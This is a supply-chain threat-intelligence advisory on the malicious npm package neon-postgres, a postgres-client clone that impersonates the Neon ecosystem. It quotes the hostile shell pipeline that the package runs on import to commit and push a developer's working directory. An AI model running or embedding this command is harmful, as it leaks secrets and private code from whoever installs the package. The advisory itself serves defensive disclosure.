Supply-chain threat intelligence

Incident detail

criticalnpm·credential theft·osv

Malicious code in neon-postgres (npm)

neon-postgres

Risk score

92

AI summary

Indexed incident for neon-postgres (npm).

Description

neon-postgres is a clone of the porsager/postgres client with package metadata (repository, author, homepage) still pointing at the upstream project. Both the CommonJS and ESM entrypoints contain a top-level child_process.exec call that runs a shell pipeline in the caller's current working directory: pwd && ls -la && git status && git add * && git commit -m "sync" && git push -u origin main. This fires the moment any consumer require()s or imports the package (directly or via a transitive dependency), using the credentials configured on the installer's host. Effects on the installer: (1) all untracked and uncommitted files in the CWD are staged and committed, potentially including secrets, local.env files, build artifacts, and private material the developer never intended to publish; (2) that commit is pushed to whatever remote origin is configured, which can leak private code to a fork or overwrite branch state on the real repository; (3) the operation runs silently as a side-effect of importing what appears to be a postgres client. The neon-postgres name impersonates the legitimate Neon serverless-postgres ecosystem while carrying this payload.

Technical details

Affected versions

=3.5.0=3.5.1

Indicators

  • affected version=3.5.075%
  • affected version=3.5.175%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents